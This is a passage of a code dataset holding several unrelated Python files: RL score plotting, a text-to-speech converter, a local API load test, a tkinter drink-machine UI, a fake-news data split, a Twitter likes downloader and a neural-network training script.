best_avg_score = None\n episode_achieved = 0\n final_avarage = 0\n highest = 0\n\n if scores_window > 0:\n moving_avarages = []\n if len(agents)>1: \n moving_avarages = calculate_moving_avarage(scores, len(agents), scores_window=scores_window)\n\n best_of_two = calculate_moving_avarage(calculate_max(scores), 1, scores_window=scores_window)\n\n episode_achieved = np.argmax(best_of_two[0])\n best_avg_score = best_of_two[0][episode_achieved]\n episode_achieved += scores_window\n final_avarage = best_of_two[0][-1]\n highest = max(scores[0])\n\n ax.plot(np.arange(len(best_of_two[0]) + scores_window)[scores_window:], best_of_two[0], 'k-')\n else: \n moving_avarages = calculate_moving_avarage(scores, len(agents), scores_window=scores_window)\n \n episode_achieved = np.argmax(moving_avarages[0])\n best_avg_score = moving_avarages[0][episode_achieved]\n episode_achieved += scores_window\n final_avarage = moving_avarages[0][-1]\n highest = max(scores)\n \n for i_agent in range(len(moving_avarages)):\n ax.plot(np.arange(len(moving_avarages[i_agent]) + scores_window)[scores_window:], moving_avarages[i_agent], 'm-')\n \n if goal > 0.: ax.axhline(y=goal, color='c', linestyle='--')\n\n # --- Plot table --- #\n # for env #\n tb1.axis('tight')\n tb1.axis(\"off\")\n rows = env_params[0]\n columns = ['Env']\n cell_text = env_params[1]\n tb1.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n # for agent #\n tb2.axis('tight')\n tb2.axis(\"off\")\n rows = for_table[0]\n columns = ['Agent']\n cell_text = for_table[1]\n tb2.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n\n # for scores #\n tb3.axis('tight')\n tb3.axis(\"off\")\n rows = [\"best in {}\".format(scores_window), \"ep. 
achieved\", \"final avg.\", \"highest ep.\"]\n columns = ['Scores']\n cell_text = [['{:.1f}'.format(best_avg_score)], [episode_achieved], ['{:.1f}'.format(final_avarage)], [highest]]\n tb3.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n\n\n fig.tight_layout()\n\n\n # --- Save and Display --- #\n if save: fig.savefig(\"{}{}_figure_{}.jpg\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), bbox_inches='tight')\n if display: fig.show()\n\n\n\n\ndef save_scores(scores, agents, name=\"\", path=\"\"):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n if not os.path.exists(path):\n print(\"Directory doesn't exist, going to create one first\")\n os.makedirs(path)\n\n for_title, for_filename, for_table, for_id = agents[0].get_title()\n\n with open(\"{}{}_scores_{}.csv\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), 'w', newline='') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(scores)\n\n print(\"Scores saved!\")\n\n\ndef read_scores(network_name=''.format(time.strftime(\"%Y-%m-%d_%H%M\")), path=''):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n if os.path.exists(path):\n\n # _, for_filename = get_constant_string()\n\n with open(\"{}{}.csv\".format(path, network_name), newline='') as f:\n reader = csv.reader(f)\n read_score_history = list(reader)[0]\n\n parsed = [float(i) for i in read_score_history]\n\n return parsed\n\ndef save_states(states, name=\"\", path=\"\"):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n with open(\"{}{}_states_{}.csv\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(states)","repo_name":"dream-faster/research-multi-drl","sub_path":"utilities/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18394740648","text":"import pyttsx3 as tts\n\n\nclass AudioConverter:\n\n @staticmethod\n def convert_and_save(string: str, save_location: str):\n engine = tts.init()\n engine.setProperty(\"rate\", 150)\n engine.save_to_file(string, save_location)\n engine.runAndWait()\n","repo_name":"ArunaAcharya/PDFtoAudioConverter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9842883710","text":"import common\nimport unittest\nimport time\n\nGATEWAY_URL = \"http://localhost/v0\"\n\n\ndef timeit(name, itr):\n \"\"\"Return a function decorator that prints the time\n taken for execution, with a given name\n\n Args:\n name (str): test/method name\n \"\"\"\n def decor(f):\n def inner(*args, **kwargs):\n t_start = time.perf_counter()\n f(*args, **kwargs)\n elapsed = time.perf_counter() - t_start\n print(f\"{name} executed in {elapsed} seconds | N={itr} | {elapsed / itr} per iteration\")\n return inner\n return decor\n\nclass TestLoad(unittest.TestCase):\n \n def test_signup(self):\n N = 100\n users = [common.generate_user() for _ in range(N)]\n\n @timeit(f\"test_signup\", N)\n def run():\n for u in users:\n common.make_user(GATEWAY_URL, u)\n run()\n\n def test_login(self):\n N = 100\n user = common.generate_user()\n common.make_user(GATEWAY_URL, user)\n\n creds = {\"email\": user[\"email\"], \"password\": user[\"password\"]}\n\n @timeit(f\"test_login\", N)\n def run():\n for _ in range(N):\n common.login(GATEWAY_URL, creds)\n 
run()\n\n def test_get_form_client(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n\n N = 100\n\n @timeit(f\"test_get_form_client\", N)\n def run():\n for _ in range(N):\n common.get_form_client(GATEWAY_URL, form[\"id\"])\n run()\n\n def test_get_responses(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n form2 = common.make_form(GATEWAY_URL, auth, common.generate_form())\n form3 = common.make_form(GATEWAY_URL, auth, common.generate_form())\n\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form2[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form2[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form3[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form3[\"id\"], common.generate_form())\n\n\n N = 100\n\n @timeit(f\"test_get_responses\", N)\n def run():\n for _ in range(N):\n common.get_responses(GATEWAY_URL, auth)\n run()\n\n def test_patch_response(self):\n\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n\n resp = common.get_responses_params(GATEWAY_URL, auth, {\"formID\": form[\"id\"]})[0]\n\n N = 100\n\n @timeit(f\"test_patch_response\", N)\n def run():\n new_state = False\n for _ in range(N):\n common.patch_response(GATEWAY_URL, auth, resp[\"id\"], new_state)\n new_state = not new_state\n run()\n\n def test_create_tag(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_response())\n resp = common.get_responses_params(GATEWAY_URL, auth, {\"formID\": form[\"id\"]})[0]\n N = 100\n\n tag_vals = [f\"test_{i}\" for i in range(N)]\n\n @timeit(\"test_create_tag\", N)\n def run():\n for i in range(N):\n common.make_tag(GATEWAY_URL, auth, resp[\"id\"], tag_vals[i])\n\n run()\n\n\n def test_mailto(self):\n body = {\n \"to\": [\"test@example.com\"],\n \"subject\": \"test subject\",\n \"body\": \"test body\"\n }\n\n N = 100\n\n @timeit(f\"test_mailto\", N)\n def run():\n for _ in range(N):\n common.post_mailto(GATEWAY_URL, body)\n\n run()\n\n\n\n\n\n \n\nif __name__ == '__main__':\n unittest.main()","repo_name":"vinh-hua/civic-qa","sub_path":"test/e2e/load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"34526011594","text":"while True:\n try:\n height = int(input(\"Height: \"))\n if height > 0 and height < 9:\n break\n except ValueError:\n continue\n\n\nfor i in range(1, height+1):\n for j in range(height - i):\n print(\" \", end=\"\")\n print(\"#\"*i)\n ","repo_name":"JyyHuang/CIS1051","sub_path":"Lab6/mario-less-comfortable.py","file_name":"mario-less-comfortable.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10749454057","text":"from tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\n\nclass Cupselection(ttk.Frame):\n\n def __init__(self, 
parent, beverage, **options):\n super().__init__(parent, **options)\n self.init_content(beverage)\n\n def init_content(self, beverage):\n ttk.Style().configure('cupselection.top.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.big.TLabel', background=\"#201F1E\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.small.TLabel', background=\"#201F1E\", font=\"Helvetica 15\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.center.TFrame', background=\"#201F1E\")\n ttk.Style().configure('cupselection.top.TFrame', background=\"#871352\")\n topframe = ttk.Frame(self, height=120, width=800, style=\"cupselection.top.TFrame\")\n topframe.pack(side=TOP, expand=YES, fill=BOTH)\n ttk.Label(topframe, text=\"Bitte Wähle eine Größe aus\", style=\"cupselection.top.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n centerframe = CupselectionCenter(self, beverage, height=280, width=800, style=\"cupselection.center.TFrame\")\n centerframe.pack(side=BOTTOM, expand=YES, fill=BOTH)\n self.centerframe = centerframe\n\n\nclass CupselectionCenter(ttk.Frame):\n def __init__(self, parent, beverage, **options):\n super().__init__(parent, **options)\n self.profilesframes = []\n self.init_content(beverage)\n\n def init_content(self, beverage):\n #Todo calc ratio\n sizes = beverage.caclsiszes()\n index = 0\n for type, size in sizes.items():\n ttk.Style().configure('cupselection.center.cupsize.TFrame', background=\"#201F1E\")\n frame = CupselectionProfile(self,size=size, type=type, width=160, height=200, style='cupselection.center.cupsize.TFrame')\n frame.grid_propagate(0)\n frame.grid(column=index, row=0)\n Grid.columnconfigure(self, index, weight=1)\n Grid.rowconfigure(self, 0, weight=1)\n index += 1\n self.profilesframes.append(frame)\n\n\nclass CupselectionProfile(ttk.Frame):\n def __init__(self, parent, size, type, **options):\n super().__init__(parent, **options)\n self.size = size\n self.init_content(size, type)\n\n def init_content(self, size, type):\n canvas = Canvas(self,width=160, height=100, bg=\"#201F1E\", bd=0, highlightthickness=0, relief='ridge')\n image = Image.open(\"images/cup.png\")\n if type == \"Small\":\n image = image.resize((60, 60), Image.ANTIALIAS)\n if type == \"Medium\":\n image = image.resize((80, 80), Image.ANTIALIAS)\n if type == \"Big\":\n image = image.resize((100, 100), Image.ANTIALIAS)\n self.gif1 = ImageTk.PhotoImage(image)\n canvas.create_image(80, 100, image=self.gif1, anchor=S)\n canvas.grid(row=0, sticky=\"nsew\", pady=(10, 10))\n label = ttk.Label(self, text=type, style=\"cupselection.big.TLabel\")\n label.grid(row=1, sticky=\"nsew\", pady=(10, 10))\n label = ttk.Label(self, text=\"(\"+str(size)+\"ml\"+\")\" , style=\"cupselection.small.TLabel\",)\n label.grid(row=2, padx=(10, 10))\n\n\nclass ProgressBar(ttk.Frame):\n\n def __init__(self, parent, beverage,cupsize, **options):\n super().__init__(parent, **options)\n\n def init_content(self, beverage,cupsize):\n ttk.Style().configure('progressbar.big.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.small.TLabel', background=\"#871352\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.TLabel', background=\"#201F1E\", 
font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.top.TFrame', background=\"#871352\")\n ttk.Style().configure('progressbar.bottom.TFrame', background=\"#201F1E\")\n topframe = ttk.Frame(self, height=200, width=800, style=\"progressbar.top.TFrame\")\n if beverage and cupsize:\n ttk.Label(topframe, text=\"Dein Getränk wird gerade gemixt\", style=\"progressbar.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n else:\n ttk.Label(topframe, text=\"Dein BarMan wird gerade gereinigt\", style=\"progressbar.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n\n ttk.Label(topframe, text=\"gleich ist es soweit :)\", style=\"progressbar.small.TLabel\").pack(side=BOTTOM,\n expand=YES,\n fill=BOTH)\n\n topframe.pack(side=TOP,expand=YES, fill=BOTH)\n bottomframe = ttk.Frame(self, height=200, width=800,style=\"progressbar.bottom.TFrame\")\n bottomframe.pack(side=BOTTOM, expand=YES, fill=BOTH)\n if beverage and cupsize:\n ttk.Label(bottomframe, text=\"Dein Getränk: \" + beverage.name +\", \"+str(cupsize)+\"ml\", style=\"progressbar.TLabel\").place(x=400, y=170,\n anchor=\"center\")\n TROUGH_COLOR = '#201F1E'\n BAR_COLOR = '#871352'\n ttk.Style().configure(\"bar.Horizontal.TProgressbar\", troughcolor=TROUGH_COLOR, bordercolor=TROUGH_COLOR,\n background=BAR_COLOR, lightcolor=BAR_COLOR, darkcolor=BAR_COLOR)\n self.progressbar = ttk.Progressbar(bottomframe, style=\"bar.Horizontal.TProgressbar\", orient=\"horizontal\", length=600,\n mode=\"determinate\")\n self.progressbar.place(x=400, y=100, anchor=\"center\")\n\n def setprogress(self, value):\n self.progressbar[\"value\"] = int(value)\n\nclass DrinkFinished(ttk.Frame):\n def __init__(self, parent, beverage, **options):\n super().__init__(parent, **options)\n self.__init_content(beverage)\n\n def __init_content(self, beverage):\n ttk.Style().configure('drinkfinished.big.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.small.TLabel', background=\"#871352\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.TLabel', background=\"#201F1E\", font=\"Helvetica 30\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.top.TFrame', background=\"#871352\")\n topframe = ttk.Frame(self, height=200, width=800, style=\"drinkfinished.top.TFrame\")\n\n if beverage:\n ttk.Label(topframe, text=\"Dein Getränk ist fertig!\", style=\"drinkfinished.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n topframe.pack(side=TOP, expand=YES, fill=BOTH)\n ttk.Label(self, text=\"Dein Getränk: \" +str(beverage.name), style=\"drinkfinished.TLabel\").pack(side=BOTTOM, expand=YES, fill=BOTH)\n Grid.columnconfigure(self, 0, weight=1)\n else:\n ttk.Label(topframe, text=\"Der BarMan ist nun gereinigt!\", style=\"drinkfinished.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n topframe.pack(side=TOP, expand=YES, fill=BOTH)\n ttk.Label(self, text=\"Überprüfe ob alles Sauber ist\", style=\"drinkfinished.TLabel\").pack(side=BOTTOM,\n expand=YES,\n fill=BOTH)\n Grid.columnconfigure(self, 0, weight=1)\n","repo_name":"Flodeplay/BarMan-Device","sub_path":"Main/View/Frames/Drink/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
+{"seq_id":"28302833853","text":"fake = [1]*23481\ntrue = [0]*21417\n\nimport pandas as pd\nimport pandas\nimport numpy as np\n\n\ndf_true = pandas.read_csv(\"True.csv\")\n\ndf_true['labels'] = true\ndf_true.to_csv('new_true.csv')\n\ndf_fake = pandas.read_csv(\"Fake.csv\")\n\ndf_fake['labels'] = fake\ndf_fake.to_csv('new_fake.csv')\n\ntrain_data = pd.concat([df_true,df_fake],ignore_index=True)\n\n# Shuffling dataframe\ntrain_data = train_data.sample(frac=1).reset_index(drop=True)\n\n#partitioning into train,test and validation\n\nmsk = np.random.rand(len(train_data)) < 0.8\n\ntrain_temp = train_data[msk]\n\nval = np.random.rand(len(train_temp)) < 0.0625\n\ntrain_df = train_temp[~val]\nvalidation_df = train_temp[val]\ntest_df = train_data[~msk]\n\nprint(len(train_df))\nprint(len(test_df))\nprint(len(validation_df))\n\ntrain_df.to_csv(\"isot_train.csv\")\ntest_df.to_csv(\"isot_test.csv\")\nvalidation_df.to_csv(\"isot_validation.csv\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"PrasadKshirsagar/Fake-News-Detection-Using-Deep-Learning-Techniques","sub_path":"Datasets/ISOT_News _dataset/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28337914071","text":"'''\nAuthor: mengzonefire\nDate: 2023-03-01 13:58:17\nLastEditTime: 2023-03-15 00:33:39\nLastEditors: mengzonefire\nDescription: likes页爬取任务类\n'''\n\nimport time\nimport httpx\n\nfrom common.text import *\nfrom common.const import *\nfrom common.tools import getHttpText\nfrom task.baseTask import Task\n\n\nclass UserLikesTask(Task):\n\n def __init__(self, userName: str, uname, userId: int, cfg):\n super(UserLikesTask, self).__init__()\n self.userName = userName\n self.uname = uname\n self.userId = userId\n self.cfg = cfg\n # self.savePath = os.path.join(getContext('dl_path'), userName, 'likes')\n self.savePath = '{}/{}/likes'.format(getContext('dl_path'), userName)\n self.saveUri = '@{}/likes'.format(userName)\n def getDataList(self, cursor='', rest_id_list=[]):\n while True:\n if self.stop:\n return\n cursorPar = cursor and '\"cursor\":\"{}\",'.format(cursor)\n response = None\n with httpx.Client(proxies=getContext('proxy'), headers=getContext('headers'), verify=False) as client:\n for i in range(1, 56):\n try:\n response = client.get(userLikesApi, params={\n 'variables': userLikesApiPar.format(self.userId, twtCount, cursorPar),\n 'features': commonApiPar})\n break\n except (httpx.ConnectTimeout, httpx.ReadTimeout, httpx.ConnectError, httpx.RemoteProtocolError):\n if i >= 55:\n print(network_error_warning)\n self.stopGetDataList()\n return\n else:\n print(timeout_warning.format(i))\n time.sleep(0.3)\n if not response:\n self.stopGetDataList()\n return\n if response.status_code != httpx.codes.OK:\n print(http_warning.format('UserLikesTask.getDataList',\n response.status_code, getHttpText(response.status_code)))\n self.stopGetDataList()\n return\n self.pageContent = response.json()\n cursor, rest_id_list = self.parseData(cursor, rest_id_list)\n if not cursor:\n break\n","repo_name":"qhg1997/twitter-downloader","sub_path":"task/userLikesTask.py","file_name":"userLikesTask.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"70833549312","text":"import math\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport numpy as np\nimport os, sys\nimport time\nimport tabulate\nimport data\nimport 
training_utils\nimport nets as models\nfrom parser_train import parser\n\ncolumns = [\"ep\", \"lr\", \"tr_loss\", \"tr_acc\", \"te_loss\", \"te_acc\", \"time\"]\n\ndef set_random_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef cross_entropy(model, x, target, reduction=\"mean\"):\n \"\"\"standard cross-entropy loss function\"\"\"\n if model is not None:\n output = model(x)\n else:\n output = x\n\n loss = F.cross_entropy(output, target, reduction=reduction)\n\n if reduction is None or reduction == \"none\":\n loss = loss\n if reduction == 'mean':\n loss = torch.mean(loss)\n if reduction == 'sum':\n loss = torch.sum(loss)\n\n if model is not None:\n return loss, output\n\n return loss\n\n\ndef squared_loss(model, x, target, reduction=\"mean\"):\n \"\"\"\n This is num_class / 2 (=5) times smaller than in Katya's version, i.e. my lr is num_class / 2 (=5) times smaller than Katya's.\n \"\"\"\n if model is not None:\n output = model(x)\n else:\n output = x\n\n loss = (\n torch.sum(torch.square(output), dim=1) -\n 2 * torch.gather(output, 1, target.view(-1, 1)).reshape(-1) + 1\n ) / output.shape[1]\n\n if reduction is None or reduction == \"none\":\n loss = loss\n if reduction == 'mean':\n loss = torch.mean(loss)\n if reduction == 'sum':\n loss = torch.sum(loss)\n\n if model is not None:\n return loss, output\n\n return loss\n\ndef check_si_name(n, model_name='ResNet18'):\n if model_name == 'ResNet18':\n return \"conv1\" in n or \"1.bn1\" in n or \"1.0.bn1\" in n or ((\"conv2\" in n or \"short\" in n) and \"4\" not in n)\n elif model_name == 'ResNet18SI':\n return 'linear' not in n\n elif model_name == 'ResNet18SIAf':\n return ('linear' not in n and 'bn' not in n and 'shortcut.0' not in n)\n elif 'ConvNetSICI3WN' in model_name:\n return 'weight_v' in n\n elif 'ConvNet' in model_name:\n return 'conv_layers.0.' in n or 'conv_layers.3.' in n or 'conv_layers.7.' in n or 'conv_layers.11.' 
in n\n return False\n\ndef main():\n args = parser()\n args.device = None\n \n os.environ['CUDA_DEVICE_ORDER']='PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES']=args.gpu\n\n if torch.cuda.is_available():\n args.device = torch.device(\"cuda\")\n args.cuda = True\n else:\n args.device = torch.device(\"cpu\")\n args.cuda = False\n \n torch.backends.cudnn.benchmark = True\n set_random_seed(args.seed)\n\n # n_trials = 1\n \n print(\"Preparing base directory %s\" % args.dir)\n os.makedirs(args.dir, exist_ok=True)\n\n # for trial in range(n_trials):\n trial = args.trial\n output_dir = args.dir + f\"/trial_{trial}\"\n \n ### resuming is modified!!!\n if args.resume_epoch > -1:\n resume_dir = output_dir\n output_dir = output_dir + f\"/from_{args.resume_epoch}_for_{args.epochs}\"\n if args.save_freq_int > 0:\n output_dir = output_dir + f\"_save_int_{args.save_freq_int}\"\n if args.noninvlr >= 0:\n output_dir = output_dir + f\"_noninvlr_{args.noninvlr}\"\n if args.fix_si_pnorm:\n output_dir = output_dir + f\"_fix_si_pnorm\"\n if args.seed > 1:\n output_dir = output_dir + '_seed{}'.format(args.seed)\n \n ### resuming is modified!!!\n print(\"Preparing directory %s\" % output_dir)\n\n os.makedirs(output_dir, exist_ok=True)\n with open(os.path.join(output_dir, \"command.sh\"), \"w\") as f:\n f.write(\" \".join(sys.argv))\n f.write(\"\\n\")\n\n print(\"Using model %s\" % args.model)\n model_cfg = getattr(models, args.model)\n\n print(\"Loading dataset %s from %s\" % (args.dataset, args.data_path))\n transform_train = model_cfg.transform_test if args.no_aug else model_cfg.transform_train\n loaders, num_classes = data.loaders(\n args.dataset,\n args.data_path,\n args.batch_size,\n args.num_workers,\n transform_train,\n model_cfg.transform_test,\n use_validation=not args.use_test,\n use_data_size = args.use_data_size,\n split_classes=args.split_classes,\n corrupt_train=args.corrupt_train\n )\n\n print(\"Preparing model\")\n print(*model_cfg.args)\n\n # add extra args for varying names\n if 'ResNet18' in args.model:\n extra_args = {'init_channels':args.num_channels}\n if \"SI\" in args.model:\n extra_args.update({'linear_norm':args.init_scale})\n elif 'ConvNet' in args.model:\n extra_args = {'init_channels':args.num_channels, 'max_depth':args.depth,'init_scale':args.init_scale}\n elif args.model == 'LeNet':\n extra_args = {'scale':args.scale}\n else:\n extra_args = {}\n\n if args.same_init:\n set_random_seed(228)\n model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs,\n **extra_args)\n set_random_seed(args.seed)\n \n else:\n model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs,\n **extra_args)\n \n if args.same_last_layer and 'ConvNet' in args.model:\n set_random_seed(228)\n fin = nn.Linear(model.linear_layers[-1].in_features,model.linear_layers[-1].out_features) \n alpha = args.init_scale\n W = fin.weight.data\n model.linear_layers[-1].weight.data = alpha * W / W.norm()\n model.linear_layers[-1].bias.data = fin.bias.data\n set_random_seed(args.seed)\n\n if args.same_last_layer and 'ResNet18' in args.model:\n set_random_seed(228)\n fin = nn.Linear(model.linear.in_features,model.linear.out_features,bias=False)\n alpha = args.init_scale\n W = fin.weight.data\n model.linear.weight.data = alpha * W / W.norm()\n set_random_seed(args.seed)\n \n model.to(args.device)\n\n if args.fix_elr:\n print(\"Training with fixed ELR\")\n if args.momentum:\n print(\"WARNING: fixing ELR with momentum is ambiguous!\")\n\n if args.model == 'ResNet18':\n params_dict = 
dict(model.named_parameters())\n param_groups = []\n\n # single pre-BN params first\n singles = training_utils.get_resnet_prebn_groups(g=1)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in singles])\n\n # then pairs of pre-BN params\n pairs = training_utils.get_resnet_prebn_groups(g=2)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in pairs])\n\n # then triples of pre-BN params\n triples = training_utils.get_resnet_prebn_groups(g=3)\n param_groups.extend([{\"params\": [params_dict[n] for n in group]} for group in triples])\n\n # finally others\n other_params = [p for n, p in params_dict.items() if all(n not in g for g in singles + pairs + triples)]\n param_groups.append({\"params\": other_params})\n\n elif 'ConvNetSI' in args.model or args.model == 'ResNet18SI':\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, # SI params are convolutions\n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)]}, # other params\n ]\n\n else:\n raise ValueError(\"Fixing ELR currently is not allowed for this model!\")\n\n # elr_coefs are coefs to multiply by lr * norm^2 for the fixed ELR, i.e.,\n # prebn_lr = elr_coef * lr * norm^2 => elr = prebn_lr / norm^2 = elr_coef * lr\n \n with torch.no_grad():\n si_pnorm_0 = np.sqrt(sum((p ** 2).sum().item() for p in param_groups[0][\"params\"]))\n lr = args.elr * si_pnorm_0 ** 2\n elif args.fix_all_elr:\n print(\"Training with all fixed ELRs\")\n if args.momentum:\n print(\"WARNING: fixing ELR with momentum is ambiguous!\")\n\n if 'ConvNetSI' in args.model or args.model == 'ResNet18SI':\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, # SI params are convolutions\n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)]}, # other params\n ]\n else:\n raise ValueError(\"Fixing ELR currently is not allowed for this model!\")\n\n with torch.no_grad():\n si_pnorm_0 = np.sqrt(sum((p ** 2).sum().item() for p in param_groups[0][\"params\"]) /\n sum(p.shape[0] for p in param_groups[0][\"params\"]))\n training_utils.fix_si_pnorms(model, si_pnorm_0, args.model)\n pnorm_0_sqr_total = sum((p ** 2).sum().item() for p in param_groups[0][\"params\"])\n lr = args.elr * pnorm_0_sqr_total\n else:\n param_groups = model.parameters()\n si_pnorm_0 = None\n lr = args.lr_init\n elr_coefs = None\n \n if args.noninvlr >= 0:\n param_groups = [\n {'params': [p for n, p in model.named_parameters() if check_si_name(n, args.model)]}, \n {'params': [p for n, p in model.named_parameters() if not check_si_name(n, args.model)],'lr':args.noninvlr}, \n ]\n\n optimizer = torch.optim.SGD(param_groups, \n lr=lr, \n momentum=args.momentum, \n weight_decay=args.wd)\n\n if args.cosan_schedule:\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)\n \n epoch_from = args.resume_epoch + 1\n epoch_to = epoch_from + args.epochs\n print(f\"Training from {epoch_from} to {epoch_to - 1} epochs\")\n\n if args.resume_epoch > -1:\n # Warning: due to specific lr schedule, resuming is generally not recommended!\n print(f\"Loading checkpoint from the {args.resume_epoch} epoch\")\n state = training_utils.load_checkpoint(resume_dir, args.resume_epoch)\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n if args.noninvlr >= 0:\n optimizer.param_groups[1][\"lr\"] = args.noninvlr\n \n else:\n #save init\n 
train_res = {\"loss\": None, \"accuracy\": None}\n test_res = {\"loss\": None, \"accuracy\": None}\n \n def save_epoch(epoch):\n training_utils.save_checkpoint(\n output_dir,\n epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict(),\n train_res=train_res,\n test_res=test_res\n )\n\n save_epoch(0)\n epoch_from +=1\n\n \n for epoch in range(epoch_from, epoch_to+1):\n train_epoch(model, loaders, squared_loss if args.use_squared_loss else cross_entropy, optimizer,\n epoch=epoch, \n end_epoch=epoch_to+1, \n eval_freq=args.eval_freq, \n save_freq=args.save_freq,\n save_freq_int=args.save_freq_int,\n fix_elr = args.fix_elr,\n fix_all_elr=args.fix_all_elr,\n si_pnorm_0=si_pnorm_0,\n output_dir=output_dir,\n lr_init=lr,\n lr_schedule=not args.no_schedule,\n noninvlr=args.noninvlr,\n c_schedule=args.c_schedule,\n d_schedule=args.d_schedule,\n fbgd=args.fbgd,\n cosan_schedule = args.cosan_schedule,\n model_name = args.model)\n if args.cosan_schedule:\n scheduler.step()\n\n print(\"model \", trial, \" done\")\n\n\ndef train_epoch(model, loaders, criterion, optimizer, epoch, end_epoch,\n eval_freq=1, save_freq=10, save_freq_int=0, fix_elr=False, fix_all_elr = False,\n si_pnorm_0=None,output_dir='./',\n lr_init=0.01, lr_schedule=True, noninvlr = -1, c_schedule=None, d_schedule=None,\n fbgd=False, cosan_schedule = False, model_name = 'ResNet18'):\n\n time_ep = time.time()\n\n if not cosan_schedule:\n if not lr_schedule:\n lr = lr_init\n elif c_schedule > 0:\n lr = training_utils.c_schedule(epoch, lr_init, end_epoch, c_schedule)\n elif d_schedule > 0:\n lr = training_utils.d_schedule(epoch, lr_init, end_epoch, d_schedule)\n else:\n lr = training_utils.schedule(epoch, lr_init, end_epoch, swa=False)\n if noninvlr >= 0:\n training_utils.adjust_learning_rate_only_conv(optimizer, lr)\n else:\n training_utils.adjust_learning_rate(optimizer, lr)\n else:\n for param_group in optimizer.param_groups:\n lr = param_group[\"lr\"]\n break\n\n train_res = 